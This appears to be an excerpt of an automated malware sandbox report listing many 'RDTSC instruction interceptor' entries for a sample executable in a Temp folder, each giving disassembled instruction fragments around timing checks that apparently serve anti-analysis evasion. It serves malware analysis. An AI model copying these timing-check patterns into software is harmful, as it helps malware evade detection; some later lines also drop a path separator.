Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E33C0 second address: 5E33D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29F0CD5296h 0x00000008 jnl 00007F29F0CD5296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EAD39 second address: 5EAD68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29F0C5275Bh 0x00000010 push ecx 0x00000011 jmp 00007F29F0C5275Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E98DD second address: 5E98E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E98E3 second address: 5E98FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F29F0C5275Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F29F0C52756h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E9C0B second address: 5E9C15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E9D91 second address: 5E9D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E9D96 second address: 5E9D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E9EFC second address: 5E9F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29F0CD529Dh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD529Ch 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E9F20 second address: 5E9F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5E9F24 second address: 5E9F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jne 00007F29F0CD5296h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA099 second address: 5EA0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA0A1 second address: 5EA0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0CD52A0h 0x0000000a jmp 00007F29F0CD52A5h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F29F0CD5296h 0x0000001a jp 00007F29F0CD5296h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA0DC second address: 5EA0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA0E0 second address: 5EA0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA0EC second address: 5EA0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA0F0 second address: 5EA0F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EA0F6 second address: 5EA0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5EE6B3 second address: 5EE6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5F4F44 second address: 5F4F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5F4F4A second address: 5F4F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5F4F50 second address: 5F4F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5F4F59 second address: 5F4F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5F4F5D second address: 5F4F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5FED45 second address: 5FED49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 5FED49 second address: 5FED64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F29F0C5275Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 601EB8 second address: 601EC2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 520013 second address: 52002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C52763h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 506758 second address: 50676F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F29F0CD52A2h 0x0000000f jno 00007F29F0CD5296h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 50677D second address: 506799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 612D48 second address: 612D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 612D4C second address: 612D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F29F0C52756h 0x0000000e jns 00007F29F0C52756h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 615788 second address: 6157A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62DE14 second address: 62DE2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62DE2B second address: 62DE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62DE30 second address: 62DE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E40E second address: 62E417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E417 second address: 62E41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E41D second address: 62E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007F29F0CD529Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E5B4 second address: 62E5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E5B8 second address: 62E5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E5C4 second address: 62E5E4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29F0C52758h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29F0C52762h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E5E4 second address: 62E5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E749 second address: 62E75C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jl 00007F29F0C52756h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E75C second address: 62E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F29F0CD5296h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E76B second address: 62E76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E76F second address: 62E779 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E779 second address: 62E788 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29F0C5275Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E788 second address: 62E78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 62E78E second address: 62E796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 632A91 second address: 632A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 632A95 second address: 632A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE RDTSC instruction interceptor: First address: 632A9B second address: 632AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632CED second address: 632CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632CF2 second address: 632D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A6h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632D89 second address: 632D97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632D97 second address: 632DBB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29F0CD52A6h 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632DBB second address: 632E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F29F0C52756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jno 00007F29F0C52758h 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F29F0C52758h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov dword ptr [ebp+1246134Ch], ebx 0x00000037 call 00007F29F0C52759h 0x0000003c jmp 00007F29F0C52768h 0x00000041 push eax 0x00000042 jmp 00007F29F0C52764h 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b push esi 0x0000004c jmp 00007F29F0C52764h 0x00000051 pop esi 0x00000052 mov eax, dword ptr [eax] 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push edx 0x00000058 pop edx 0x00000059 jmp 00007F29F0C5275Bh 0x0000005e popad 0x0000005f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6330D4 second address: 6330D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6330D8 second address: 6330DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 634B24 second address: 634B36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F29F0CD529Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6346AE second address: 6346BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29F0C52762h 0x00000008 jg 00007F29F0C52756h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6346BE second address: 6346DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F29F0CD52A5h 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30009 second address: 4C3003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 jmp 00007F29F0C52763h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29F0C52765h 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3003D second address: 4C3009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29F0CD52A1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov bx, si 0x00000014 pushfd 0x00000015 jmp 00007F29F0CD52A8h 0x0000001a adc ecx, 5F72FF58h 0x00000020 jmp 00007F29F0CD529Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C3009D second address: 4C300A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C300A1 second address: 4C300A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C300A5 second address: 4C300AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C300AB second address: 4C300E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F29F0CD52A8h 0x00000008 pop ecx 0x00000009 mov dh, D5h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29F0CD52A9h 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0C4F second address: 4BB0C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0C55 second address: 4BB0CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 13h 0x0000000d pushfd 0x0000000e jmp 00007F29F0CD529Ah 0x00000013 adc si, 2B98h 0x00000018 jmp 00007F29F0CD529Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F29F0CD52A4h 0x00000027 adc si, 55F8h 0x0000002c jmp 00007F29F0CD529Bh 0x00000031 popfd 0x00000032 pushad 0x00000033 movzx eax, dx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0CB6 second address: 4BB0CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F29F0C52767h 0x0000000d push dword ptr [ebp+04h] 0x00000010 pushad 0x00000011 jmp 00007F29F0C52764h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0D4B second address: 4BB0D64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0D64 second address: 4BB0D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BB0D68 second address: 4BB0D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0AB9 second address: 4BE0ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BE0ABD second address: 4BE0AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
